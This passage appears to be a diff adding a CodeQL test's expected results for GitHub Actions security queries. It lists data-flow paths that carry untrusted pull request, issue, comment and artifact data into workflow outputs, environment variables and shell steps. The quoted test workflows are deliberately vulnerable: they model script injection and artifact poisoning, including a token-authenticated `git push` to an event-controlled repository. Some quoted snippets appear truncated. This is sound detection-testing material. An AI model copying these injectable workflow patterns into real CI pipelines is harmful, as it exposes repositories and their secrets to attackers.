github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | provenance | | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | provenance | | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | provenance | | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | provenance | | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | provenance | | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | provenance | | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | provenance | | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | provenance | | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | provenance | | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | provenance | | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | +| .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | provenance | | +| .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | provenance | | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | provenance | | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | provenance | | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | +| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact [id] | semmle.label | Run Step: artifact [id] | +| .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| 